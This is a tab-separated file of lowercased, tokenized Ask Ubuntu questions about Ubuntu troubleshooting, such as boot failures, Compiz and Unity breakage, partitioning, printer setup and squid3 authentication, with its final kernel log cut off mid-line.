316539	how to know what makes ubuntu shut down ?	i leave my machine a while . after i come back , i find machine shut down . how to know what makes my machine shut down ? i do not shut down it manually . i use ubuntu12.04.2 amd64 arch .
316540	help - compiz fails , no unity , blank desktop after 13.04 upgrade	i was having ubuntu 12.10 and then decided to upgrade to 13.10 using software updater . after upgrading , desktop is blank .i.e the unity taskbar , unity bar , etc.. is not showing up ... . i installed nvidia-current driver . but this did n't help . then i switched to terminal ctrl+alt+f1 and issued display=:0 compiz -- replace . but this is also not helping . its giving me below result compiz ( decor ) - warn : no default decoration found , placement will not be correct . i have desktop of below configurations : asus motherboard . intel core i5 processor - generation i 4gb ram nvidia 9600gt graphic card
316542	python 3.3.2 installation	i am using ubuntu 12.04 and already have python 2.7 installed . i need python 3.3.2 to be installed for some course . so i am trying to do that . i found this ubuntu link install python 3.3.2 on ubuntu i tried to do the same . it was succesful but it 's not running python 3.3.2 but running python 3.2.3 . how should i install python 3.3.2 ?
316544	could not establish a connection to wifi	i could not establish a wifi connection on my hp pavillion g6-2203tx laptop on ubuntu 12.02lts platform , but i could connect using wired connection , i also have windows 8 os , there i 'm not finding this problem .
316550	print quality for hp mfp 1005 printer	i have installed hp mfp 1005 in my ubuntu 13.04 . but there are no options like 1200 dpi or 600 dpi . here are only normal and draft options . but in the normal option still print is not good as 600 dpi in windows . help me .
316554	where is dconf in ubuntu-12.04 desktop-32 bit	i am not able to find dconf in ubuntu-12.04 desktop-32 bit ?
316555	is it possible to still see old windows 7 documents ?	i have recently installed ubuntu and it is working great . the question i have is when ubuntu was installed did it use a separate partion on the hard drive ? the reason i ask is because there are a number of documents that i had created in windows 7 that i would like to use if possible , but i am unsure as to get at them .
316560	can ubuntu run on 512mb ram ?	i have a system which has 512 mb ram . it is a 32bit system i like to work in ubuntu os : does anyone have experience with installing/running ubuntu on 512mb ram ? will it run properly ?
316572	google notification error `` unusual traffic from your computer network ''	i received the error when i search on google `` unusual traffic from your computer network '' notification.. we 're sorry ... '' your computer or network may be sending automated queries . to protect our users , we ca n't process your request right now . '' see google help for more information . right now i am using the `` ubuntu 12.04 '' 32 bit version . please any one can help me or suggest why this is happens & how i can resolve it ? thank you for your worthily suggestion .
316575	how to find request per second in apache2 on linode vps ( ubuntu 12.04 )	how to find request per second on my linode vps ( ubuntu 12.04 ) .i have apache2 with mysql , apc and memcache .
316582	boot trouble-shooting	i am new to ubuntu ... last time i was deleting many unwanted personal files ... but i think i have mistakenly deleted a system folder too ... n i dont know what it was ... and i am not sure whether that folder was a system folder or not ... after that i shut down my laptop and now when i try to switch it on a message is displayed like never before : '' gnu grub version blah blah ( outside the box ) ( inside the box ) okay here is the details of the screen while booting from where i dont know what to do ... ===================================================== gnu grub version 1.99-21ubuntu3.1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ubuntu with linux3.2.0-29-generic-pae ubuntu with linux3.2.0-29-generic-pae ( recovery mode ) previous linux version memory test ( memtest86+ ) memory test ( memtest86+ , serial console115200 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- and below the box the message is as : use the up and down arrow keys to select which entry is highlighted press enter to boot the selected os , 'e ' to edit commands before booting , or 'c ' for a command line ======================================================= choosing first option leads me to a blank screen with a blinking cursor where i cant type anything ... just a black screen and blinking cursor and nothing more ... . choosing 2nd option i.e . recovery mode leads me to a screen where many codes are generated ... ( sorry i could not upload a image due to points issue ) and in that page after many codes everything is said `` ... done '' but at bottom it shows error message -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - [ 3.28538 ] init : failed to spawn friendly recovery pre-start process : unable to execute : no such file or directory [ 3.28538 ] init : failed to spawn friendly recovery posy-stop process : unable to execute : no such file or directory _ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - and then again a black screen with some texts and blinking cursor ... : ( choosing third option takes me to a screen as : ====================================== ubuntu with linux3.2.0-29-generic-pae ubuntu with linux3.2.0-29-generic-pae ( recovery mode ) ====================================== at the same place again and everything takes place similarly ... i do not know what to do ... please help ... ( box closes ) choose one of the options '' i didnt understood anything but ... no option leads me to the os choosing my normal ubuntu version shows up a black screen with out anything ... jst `` _ '' at the top left and nothing all ... choosing recovery mode generates many codes blah blah blah done blah blah blah done blah blah blah done n then it stops and nothing works after that ... . i dont know what to do ... do i need to try boot repair disk method ... or i need to reinstall os ... if i reinstall the os then will i loose my datas or i wont ... please sumbody help me ... update : i ve tried boot repair disk n it gave me url hope it will help ... http : //paste.ubuntu.com/5849279/
316583	unable to read text when using a dark theme	anytime i install a dark theme i am unable to read the text in the software center as well as many other applications because the text is white and the software center background is also white . does anyone know how i can fix this ?
316585	error : no such partition ( duplicate , but none of the others helped , unless i missed one )	hi i have a sony vaio vpcej with windows 7 as the primary os . i installed ubuntu , as dual boot , a year ago for school because i had a sudden interest in programming and thought it would be fun to learn how to use it . unfortunately i 've stopped using it and being `` smart '' i deleted the partitions that were blank . now when i start my laptop i get : error : no such partition . grub rescue the only command that works here is `` ls '' and i checked each of the options that were written ( `` ls ( hs0 , y '' ) to see what i can do , but that amounted to nothing and other then that i have no idea what i can do there . when i set up ubuntu boot drive on a usb ( like lili usb creator or universal usb installer ) this shows up : syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h : peter anvin et al if i try f10 , f8 , or alt+f8/f10 i only get a blank screen . it wo n't let me factory reset or access the menus altogether . tomorrow , i am gon na try to borrow a friends windows 7 cd to try to boot it that way . if there is any help you can give me , it would truly be appreciated !
316604	gdb import error âimporterror : no module named _weakref â	i am getting below error when i try to run gdb . from the command line . if type gdb , i get the following error . root @ ubuntu : ~ # gdb traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 68 , in < module > import os file `` /usr/lib/python2.7/os.py '' , line 398 , in < module > import userdict file `` /usr/lib/python2.7/userdict.py '' , line 83 , in < module > import _abcoll file `` /usr/lib/python2.7/_abcoll.py '' , line 11 , in < module > from abc import abcmeta , abstractmethod file `` /usr/lib/python2.7/abc.py '' , line 8 , in < module > from _weakrefset import weakset file `` /usr/lib/python2.7/_weakrefset.py '' , line 5 , in < module > from _weakref import ref importerror : no module named _weakref how can i resolve this ? thank you
316605	unable to install ubuntu 13.04 on hp p2-1334 desktop pc ( preinstalled windows 8 ) - blank screen/hang	problem : [ i get a text mode menu from grub that ask me if i want to install , after selecting to install , the screen goes black-blank and lastly pc hangs , no more actions or noises ] steps i 've done : bios changes : - boot order ( to make it boot from a cd or usb drive ) - secure boot option disabled result [ fail ] from windows 8 accessed change pc settings selected to restart from a cd or usb drive > advance settings option fast start up disable result [ fail ]
316607	moving a partiton	i recently installed xubuntu ( my first time ) and created two partitions : the root partition for the os and my own partition ( to store musc , movies , photos etc . ) , but insted of creating my partition in /home i created it in /usr . my question is : how can i move the /usr partition in /home partition ?
316609	unity is not responding to mouse clicks	i am using ubuntu for 5 weeks now . last night ubuntu did not respond to mouse clicks . but movement works just fine . i thought this was because off my wireless mouse . so i plugged in a mouse with an usb-cable . same problem . i have a standard installation of 12.04lts . i think the problem occured some time ( not immidately ) after latest updates .
316610	unable to satisfy all constraints on the partition	i have dual-boot windows 7 32bit with ubuntu 12.04 lts 64bit in a single hdd . i wanted to gave my ubuntu partition more space of my hdd . unfortunately , when i open gparted it showed me an unallocated space on my partitioning table . this very `` unallocated space '' actually contains my c : / and d : / partition of my windows 7 . when i double clicked the item , it showed me this warning : `` unable to satisfy all constraints on the partition '' . please , help me . i want my partitioning table to be fixed . so that , i can grow my ubuntu partition .
316611	simple way to recover a deleted file in a sub-dir of an encrypted home directory ( ext4 file-system )	i need a simple way to do it , such as one command or program to which : specify the directory the file was in ask for the list of the recoverable files found specify which files have to be undeleted specify the output directory where the file shall be recovered a `` start recovery '' command as outlined in the title , the deleted file is in a sub directory of my /home/username/desktop/ directory , and the whole /home/username directory content is encrypted as chosen during ubuntu 13.04 installation . i 'm currently and regularly logged in . the file system is ext4 . thank you very much , have a good day . andrew
316612	golden dict problem	i have just install 'goldendict ' on my ubuntu 13.04 and when i try to run it a massage apears : goldendict has crashed with an unexpected exception exception : config : :exmalformedconfigfile message : the configuration file is malformed backtrace : /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( +0x5ef76 ) [ 0x7f874ddf3f76 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( +0x5efa3 ) [ 0x7f874ddf3fa3 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 ( +0x5f1de ) [ 0x7f874ddf41de ] goldendict ( config : :load ( ) +0xa25 ) [ 0x484075 ] goldendict ( main+0x48a ) [ 0x4584aa ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7f874d4d3ea5 ] goldendict ( ) [ 0x459d81 ] can any body help me dealing with this problem ? thanks
316621	disable animations when opening applications	i 'm very new to ubuntu and currently have 13.04 running but have so far really enjoyed my experience . a couple of days ago i installed 'docky ' as i prefer to have my shortcuts at the bottom of the screen and set the standard launcher to auto hide , as well as setting the sensitivity all the way down so it doesnt appear unless i really want it to . my problem is that whenever i open a new application , or minimize an already opened application , a small icon animation appears on the left edge of the screen . i 've posted an image below where you can see what im referring to , it 's the small chromium icon on the left . i want to know the exact process in stopping these animations . i 've installed compiz and gone through all the settings but cant find which one would disable this animation when opening and minimizing applications . screenshot of what i 'm referring to : any assistance would be greatly appreciated and thank you in advance for your help .
316626	ubuntu host can not get ip after pc exit from hibernate mode	we found usb enumeration is correct proper with the n/w device or dongle which supports the 3g n/w but dhcp client on ubuntu host is not launched ( checked with ps command ) . after re-plugging usb cable , dhcp client is launched successfully then ip is obtained . if executing command `` pm-hibernate '' in terminal to trigger entering hibernate , ubuntu host can get ip successfully after exiting hibernate . could you help for why ubuntu host dhcp client is failed run when we use the hibernate option from start menu . how to resolve this issue.please suggest.do you have any comment on this observation ? thanks .
316628	going to the parent directory of a file with cd ?	i am writing a .sh to do some work for me , but i am now at the point where i have to cd to the directory the file /path/to/file.end is in . terminal does n't allow cd /path/to/file.end bash : cd : /path/to/file.end : not a directory there is sadly no workaround i know of , so it would be nice if you could help !
316629	qml button colors not working	i have followed the steps in here , and the app runs , but i am running into a little problem . the buttons for input and output are nigh invisible , as they use the same grey background color as the entire page , with their text being merely a slightly whiter grey . it 's practically unreadable . see here . i tried to give them an orange color by color : ubuntucolors.orange in each button definition , but i am still getting the same grey thingy . i must be doing something wrong , but what ? edit i was able to fix the problem by purging the ppas using ppa-purge , and then reinstalling the ubuntu sdk from the main servers ( apparently , it 's there for 13.04 without ppas ) . now my buttons are visible , but giving them another color does not work . referenceerror : ubuntucolors is not defined . this last one is apparently a bug , https : //bugs.launchpad.net/ubuntu-ui-toolkit/+bug/1197293
316631	error : unable to correct problems , you have held broken packages	i am trying to install -y kvm libvirt-bin pm-utils in my ubuntu 12.04 lts version but i am getting the error e : unable to correct problems , you have held broken packages . please help me . i am stuck with this .
316636	wacom graphire buttons stopped working on ubuntu upgrade from 12.10 to 13.04	my wacom tablet with the mouse was working fine on 12.10 but now that i have upgraded to 13.04 the mouse moves and the scroll wheel scrolls correctly , but the buttons are ignored . i still have the wacom item in system settings .
316637	using a different desktop wallpaper from my lockscreen on gnome 3.8 , ubuntu-tweak no longoer loading on ubuntu 13.04	so i am new to ubuntu i basically know nothing about it a friend convinced me to switch to the os , everything was going fine i had managed to make my pc look like mac but now i just ran into a problem . it seems that any image i set for my desktop backgroung turns into my lockscreen . i have a wallpaper would love to use for my lockscreen but i cant . i have managed to switch to gnome 3.8 . i tried installing ubuntu-tweak it worked for the first few rounds on unity but when i moved to gnome i tried to run it and it would just close . the system would ask me either to relaunch the app or leave closed so i cant use it anymore . i need help with that too
316638	missing operating system message after installing ubuntu 12.04 on windows 7 and windows 8	initially , i had windows 7 and windows 8 running on the same system . ( dual boot ) . and i wanted to install ubuntu for my work . i downloaded ubuntu 12.04 and burned it on a disk and installed it . while installing , it asked to select partition , i had only 1 disk which i selected . later , when i tried to boot , no boot options were displayed , directly ubuntu started . once i restarted , i got a message saying : `` missing operating system '' i restarted and ubuntu started itself . i have lots of data on windows please help me here . either tell me how to open windows , or at least how to access windows files .
316645	how do i install my lexmark x1270 printer on ubuntu 12.04	i have been trying for days to install the above-mentioned printer under 12.04 . under hardy ( 8.04 ) it went fine . is it possible under 12.04 lts at all ?
316646	how to get compiz work on gnome in ubuntu 13.04 ?	i 'm running ubuntu 13.04 with gnome . i installed compizconfig settings manager from ubuntu software center , but it does n't seem to work at all ( no effect , animations , nothing ... ) . i also tried to log out , and switch to gnome classic ( i read that compiz only work on the classic version of gnome ) but that did n't help either . how do i make compiz work with gnome/gnome classic ? and are there any good alternatives to compiz under gnome ? if i did n't provide other helpful data about my system please let me know . thanks !
316647	ubuntu 13.04 64 bit broken unity and compiz after installing nvidia driver	my ubuntu 13.04 64 bit broken unity and compiz after installing nvidia driver , i 've tried the below command : dconf reset -f /org/compiz/ unity -- reset-icons & disown but i get : compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - error : another window manager is already running on screen : 0 compiz ( core ) - info : stoping plugin : core compiz ( core ) - info : unloading plugin : core i found a page here saying that reboot if it does n't work right away . same broken unity after reboot . any help ?
316649	how to give root level access ?	when i tried to mount my hard drive following error got displayed . i am very new to linux . please help . mount /dev/sda2 /media/shashi/ -t ntfs -o nls=utf8 , umask=0222 mount : only root can do that what should i do to give root level access ?
316654	kworker blocking port 80 after update	after an update and reboot , my file server doesnt work as expected anymore - port 80 gets blocked right away by a process kworker , making it impossible for nginx to use it . : ~ # ps aux | grep kworker root 4 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/0:0 ] root 5 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:0 ] root 9 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/1:0 ] root 11 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/0:1 ] root 14 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/2:0 ] root 18 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/3:0 ] root 22 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/4:0 ] root 26 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/5:0 ] root 30 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/6:0 ] root 34 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/7:0 ] root 41 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:1 ] root 49 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/1:1 ] root 50 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/2:1 ] root 51 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/3:1 ] root 52 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/4:1 ] root 53 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/5:1 ] root 54 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/6:1 ] root 55 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/7:1 ] root 78 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:2 ] root 79 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:3 ] root 80 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:4 ] root 81 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:5 ] root 82 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:6 ] root 83 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/u:7 ] root 103 0.0 0.0 0 0 ? s 07:25 0:00 [ kworker/3:2 ] root 839 0.0 0.0 0 0 ? s 07:26 0:00 [ kworker/2:2 ] root 1526 0.0 0.0 9388 924 pts/0 s+ 07:29 0:00 grep -- color=auto kworker - : ~ # uname -r 3.2.0-49-generic what could be the problem here ? i need to solve it asap , since it 's impossible to access the files over web at this point . already tried a reboot , didnt help . thanks for the help .
316657	dual boot problem ubuntu 11.10 +windows xp	i have aldready installed the ubuntu 11.10 version.now i want to install windows xp .i partitioned my disk through ubuntu live cd and i created a partition of 50 gb.when i boot from windows cd , after a while a bsod pops out and is says that i got a fatal error which is kinda like 0x000007e plus other hex adresses and below it says psi.sys.what should i do ? when i try to install windows in a virtual machine den there is no problem at all .
316659	squid3 ncsa basic auth always fails	i 'm trying to make squid3 to use basic authentication . but while i 'm providing correct username/password authentication fails ! my acl and http_access in squid.conf is : acl manager proto cache_object acl localhost src 127.0.0.1/32 : :1 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 : :1 acl ssl_ports port 443 acl ssl_ports port 80 acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect auth_param basic program /usr/lib/squid3/ncsa_auth /etc/squid3/users auth_param basic realm private auth_param basic credentialsttl 2 hours auth_param basic casesensitive off acl ncsa_users proxy_auth required http_access allow ncsa_users http_access allow manager localhost http_access deny manager http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access allow localhost http_access deny all i 'm creating /etc/squid3/users with : htpasswd /etc/squid3/users myusername when i configure the proxy in firefox and it requests password i provide correct username/password but it fails and it prompts again . what is the problem ?
316660	relation of swappines and zram	i have been interested in zram so i tried to test it . but as i continue to read the guide on what and how to install it , i have realized that it creates a file /dev/zram0 and mounts it as a swap , i use mount to know it . i have set the swappiness of the os on a value of 10 . will this affect the chances that zram will be used ? if yes , do i have to set it on a higher value ?
316661	chown -r user : user . * changes permissions backwards : is this the correct behaviour ?	i got into a lot of trouble when changing the permission of a folder myfolder residing in / . i issued the command sudo chown -r luca : luca /myfolder/ . * my intention was to change ownership of all the hidden files in /myfolder . unfortunately i realized that also the ownership of / was changed , which of course left me with a broken system . i think this happened because .. matches . * , but still seems weird to me . is changing the parent directory the correct behaviour or should i file a bug report ? if it was my mistake in using chown , what are the best practices to use to prevent changing the ownership of system folders and files ?
316666	how can i redownload previously purchased linux format magazine on ubuntu software center ?	i bought some issues of the linux format magazine on the ubuntu software center . i now reinstalled ubuntu and would like to redownload the magazines . in the list , they correctly appear as `` previously purchased '' , but if i try to install them , i see : there is n't a software package called lxf171 in your current software sources . also , the magazines do not appear when i click on reinstall previous purchases in the menu . if i try to buy a new issue , everything works perfectly . does anyone know how can i download the magazines that i already paid and donwloaded in the past ?
316673	ubuntu stucks at shutdown screen	i have just installed e4rat ( a program to make your boot time faster ) and setted it up . now the boot time is much faster , but when i want to shutdown or reboot my machine stucks at the shutdown-screen . what can i do to prevent the stuck on the bootscreen ? thanks for your help ! i 'm not using ubuntu on virtualbox . ubuntu ( 13.04 ) is my real hard-drive-installed pc-system . but i have installed virtualbox from the software center on my ubuntu 13.04 . here are the last lines from /var/log/kern.log : jul 5 15:50:15 my-pc-name kernel : [ 2.741138 ] sr 0:0:0:0 : attached scsi cd-rom sr0 jul 5 15:50:15 my-pc-name kernel : [ 2.741215 ] sr 0:0:0:0 : attached scsi generic sg0 type 5 jul 5 15:50:15 my-pc-name kernel : [ 2.752223 ] scsi 0:0:1:0 : direct-access ata samsung sp0802n tk10 pq : 0 ansi : 5 jul 5 15:50:15 my-pc-name kernel : [ 2.752340 ] sd 0:0:1:0 : [ sda ] 156368016 512-byte logical blocks : ( 80.0 gb/74.5 gib ) jul 5 15:50:15 my-pc-name kernel : [ 2.752351 ] sd 0:0:1:0 : attached scsi generic sg1 type 0 jul 5 15:50:15 my-pc-name kernel : [ 2.752417 ] sd 0:0:1:0 : [ sda ] write protect is off jul 5 15:50:15 my-pc-name kernel : [ 2.752419 ] sd 0:0:1:0 : [ sda ] mode sense : 00 3a 00 00 jul 5 15:50:15 my-pc-name kernel : [ 2.752453 ] sd 0:0:1:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua jul 5 15:50:15 my-pc-name kernel : [ 2.788612 ] sda : sda1 sda2 < sda5 > jul 5 15:50:15 my-pc-name kernel : [ 2.788899 ] sd 0:0:1:0 : [ sda ] attached scsi disk jul 5 15:50:15 my-pc-name kernel : [ 2.824219 ] tsc : refined tsc clocksource calibration : 3515.547 mhz jul 5 15:50:15 my-pc-name kernel : [ 2.824222 ] switching to clocksource tsc jul 5 15:50:15 my-pc-name kernel : [ 2.860181 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) jul 5 15:50:15 my-pc-name kernel : [ 2.864176 ] ata6 : sata link down ( sstatus 0 scontrol 300 ) jul 5 15:50:15 my-pc-name kernel : [ 2.868179 ] ata5 : sata link down ( sstatus 0 scontrol 300 ) jul 5 15:50:15 my-pc-name kernel : [ 2.868207 ] ata4 : sata link down ( sstatus 0 scontrol 300 ) jul 5 15:50:15 my-pc-name kernel : [ 2.880172 ] usb 4-1 : new usb device found , idvendor=0461 , idproduct=0010 jul 5 15:50:15 my-pc-name kernel : [ 2.880175 ] usb 4-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 jul 5 15:50:15 my-pc-name kernel : [ 2.880177 ] usb 4-1 : product : usb keyboard jul 5 15:50:15 my-pc-name kernel : [ 2.880178 ] usb 4-1 : manufacturer : novatek jul 5 15:50:15 my-pc-name kernel : [ 2.898203 ] usbcore : registered new interface driver usbhid jul 5 15:50:15 my-pc-name kernel : [ 2.898205 ] usbhid : usb hid core driver jul 5 15:50:15 my-pc-name kernel : [ 2.900381 ] input : novatek usb keyboard as /devices/pci0000:00/0000:00:12.1/usb4/4-1/4-1:1.0/input/input2 jul 5 15:50:15 my-pc-name kernel : [ 2.900466 ] hid-generic 0003:0461:0010.0001 : input , hidraw0 : usb hid v1.10 keyboard [ novatek usb keyboard ] on usb-0000:00:12.1-1/input0 jul 5 15:50:15 my-pc-name kernel : [ 2.902202 ] input : novatek usb keyboard as /devices/pci0000:00/0000:00:12.1/usb4/4-1/4-1:1.1/input/input3 jul 5 15:50:15 my-pc-name kernel : [ 2.902290 ] hid-generic 0003:0461:0010.0002 : input , hidraw1 : usb hid v1.10 device [ novatek usb keyboard ] on usb-0000:00:12.1-1/input1 jul 5 15:50:15 my-pc-name kernel : [ 3.067975 ] [ drm ] ib test on ring 3 succeeded in 0 usecs jul 5 15:50:15 my-pc-name kernel : [ 3.068137 ] [ drm ] radeon display connectors jul 5 15:50:15 my-pc-name kernel : [ 3.068138 ] [ drm ] connector 0 : jul 5 15:50:15 my-pc-name kernel : [ 3.068139 ] [ drm ] vga-1 jul 5 15:50:15 my-pc-name kernel : [ 3.068141 ] [ drm ] ddc : 0x7e40 0x7e40 0x7e44 0x7e44 0x7e48 0x7e48 0x7e4c 0x7e4c jul 5 15:50:15 my-pc-name kernel : [ 3.068142 ] [ drm ] encoders : jul 5 15:50:15 my-pc-name kernel : [ 3.068143 ] [ drm ] crt1 : internal_kldscp_dac1 jul 5 15:50:15 my-pc-name kernel : [ 3.068144 ] [ drm ] connector 1 : jul 5 15:50:15 my-pc-name kernel : [ 3.068145 ] [ drm ] dvi-d-1 jul 5 15:50:15 my-pc-name kernel : [ 3.068145 ] [ drm ] hpd1 jul 5 15:50:15 my-pc-name kernel : [ 3.068147 ] [ drm ] ddc : 0x7e50 0x7e50 0x7e54 0x7e54 0x7e58 0x7e58 0x7e5c 0x7e5c jul 5 15:50:15 my-pc-name kernel : [ 3.068147 ] [ drm ] encoders : jul 5 15:50:15 my-pc-name kernel : [ 3.068148 ] [ drm ] dfp1 : internal_kldscp_lvtma jul 5 15:50:15 my-pc-name kernel : [ 3.068166 ] [ drm ] radeon : power management initialized jul 5 15:50:15 my-pc-name kernel : [ 3.100826 ] [ drm ] fb mappable at 0xd0142000 jul 5 15:50:15 my-pc-name kernel : [ 3.100827 ] [ drm ] vram apper at 0xd0000000 jul 5 15:50:15 my-pc-name kernel : [ 3.100829 ] [ drm ] size 8294400 jul 5 15:50:15 my-pc-name kernel : [ 3.100830 ] [ drm ] fb depth is 24 jul 5 15:50:15 my-pc-name kernel : [ 3.100831 ] [ drm ] pitch is 7680 jul 5 15:50:15 my-pc-name kernel : [ 3.100886 ] fbcon : radeondrmfb ( fb0 ) is primary device jul 5 15:50:15 my-pc-name kernel : [ 3.116026 ] console : switching to colour frame buffer device 240x67 jul 5 15:50:15 my-pc-name kernel : [ 3.119861 ] radeon 0000:01:05.0 : fb0 : radeondrmfb frame buffer device jul 5 15:50:15 my-pc-name kernel : [ 3.119862 ] radeon 0000:01:05.0 : registered panic notifier jul 5 15:50:15 my-pc-name kernel : [ 3.119867 ] [ drm ] initialized radeon 2.29.0 20080528 for 0000:01:05.0 on minor 0 jul 5 15:50:15 my-pc-name kernel : [ 3.247801 ] usb 10-1 : new high-speed usb device number 2 using xhci_hcd jul 5 15:50:15 my-pc-name kernel : [ 3.267107 ] usb 10-1 : new usb device found , idvendor=0ace , idproduct=1211 jul 5 15:50:15 my-pc-name kernel : [ 3.267110 ] usb 10-1 : new usb device strings : mfr=16 , product=32 , serialnumber=0 jul 5 15:50:15 my-pc-name kernel : [ 3.267112 ] usb 10-1 : product : usb2.0 wlan jul 5 15:50:15 my-pc-name kernel : [ 3.267114 ] usb 10-1 : manufacturer : zydas jul 5 15:50:15 my-pc-name kernel : [ 3.399652 ] usb 3-3 : new low-speed usb device number 2 using ohci_hcd jul 5 15:50:15 my-pc-name kernel : [ 3.544557 ] scsi 6:0:0:0 : direct-access ut163 usb2flashstorage 0.00 pq : 0 ansi : 2 jul 5 15:50:15 my-pc-name kernel : [ 3.544930 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 jul 5 15:50:15 my-pc-name kernel : [ 3.545550 ] sd 6:0:0:0 : [ sdb ] 3948543 512-byte logical blocks : ( 2.02 gb/1.88 gib ) jul 5 15:50:15 my-pc-name kernel : [ 3.546301 ] sd 6:0:0:0 : [ sdb ] write protect is off jul 5 15:50:15 my-pc-name kernel : [ 3.546304 ] sd 6:0:0:0 : [ sdb ] mode sense : 00 00 00 00 jul 5 15:50:15 my-pc-name kernel : [ 3.547056 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jul 5 15:50:15 my-pc-name kernel : [ 3.547058 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jul 5 15:50:15 my-pc-name kernel : [ 3.550419 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jul 5 15:50:15 my-pc-name kernel : [ 3.550420 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jul 5 15:50:15 my-pc-name kernel : [ 3.566502 ] usb 3-3 : new usb device found , idvendor=04f3 , idproduct=0210 jul 5 15:50:15 my-pc-name kernel : [ 3.566505 ] usb 3-3 : new usb device strings : mfr=0 , product=2 , serialnumber=0 jul 5 15:50:15 my-pc-name kernel : [ 3.566508 ] usb 3-3 : product : ps/2+usb mouse jul 5 15:50:15 my-pc-name kernel : [ 3.573658 ] input : ps/2+usb mouse as /devices/pci0000:00/0000:00:12.0/usb3/3-3/3-3:1.0/input/input4 jul 5 15:50:15 my-pc-name kernel : [ 3.573746 ] hid-generic 0003:04f3:0210.0003 : input , hidraw2 : usb hid v1.11 mouse [ ps/2+usb mouse ] on usb-0000:00:12.0-3/input0 jul 5 15:50:15 my-pc-name kernel : [ 3.658439 ] sdb : sdb1 jul 5 15:50:15 my-pc-name kernel : [ 3.661296 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jul 5 15:50:15 my-pc-name kernel : [ 3.661299 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jul 5 15:50:15 my-pc-name kernel : [ 3.661301 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk jul 5 15:50:15 my-pc-name kernel : [ 4.073427 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem jul 5 15:50:15 my-pc-name kernel : [ 4.073430 ] ext4-fs ( sda1 ) : write access will be enabled during recovery jul 5 15:50:15 my-pc-name kernel : [ 5.059843 ] ext4-fs ( sda1 ) : recovery complete jul 5 15:50:15 my-pc-name kernel : [ 5.068086 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) jul 5 15:50:15 my-pc-name kernel : [ 40.713967 ] adding 3665916k swap on /dev/sda5 . priority : -1 extents:1 across:3665916k jul 5 15:50:15 my-pc-name kernel : [ 40.719413 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready jul 5 15:50:15 my-pc-name kernel : [ 40.864320 ] shpchp : standard hot plug pci controller driver version : 0.4 jul 5 15:50:15 my-pc-name kernel : [ 40.865214 ] acpi warning : 0x0000000000000b00-0x0000000000000b07 systemio conflicts with region \sor1 1 ( 20121018/utaddress-251 ) jul 5 15:50:15 my-pc-name kernel : [ 40.865225 ] mce : in-kernel mce decoding enabled . jul 5 15:50:15 my-pc-name kernel : [ 40.865228 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver jul 5 15:50:15 my-pc-name kernel : [ 40.866522 ] sp5100_tco : sp5100/sb800 tco watchdog timer driver v0.05 jul 5 15:50:15 my-pc-name kernel : [ 40.866587 ] sp5100_tco : pci revision id : 0x3c jul 5 15:50:15 my-pc-name kernel : [ 40.866605 ] sp5100_tco : failed to find mmio address , giving up . jul 5 15:50:15 my-pc-name kernel : [ 40.868247 ] lp : driver loaded but no devices found jul 5 15:50:15 my-pc-name kernel : [ 40.868991 ] edac mc : ver : 3.0.0 jul 5 15:50:15 my-pc-name kernel : [ 40.871409 ] amd64 edac driver v3.4.0 jul 5 15:50:15 my-pc-name kernel : [ 40.871444 ] edac amd64 : dram ecc disabled . jul 5 15:50:15 my-pc-name kernel : [ 40.871454 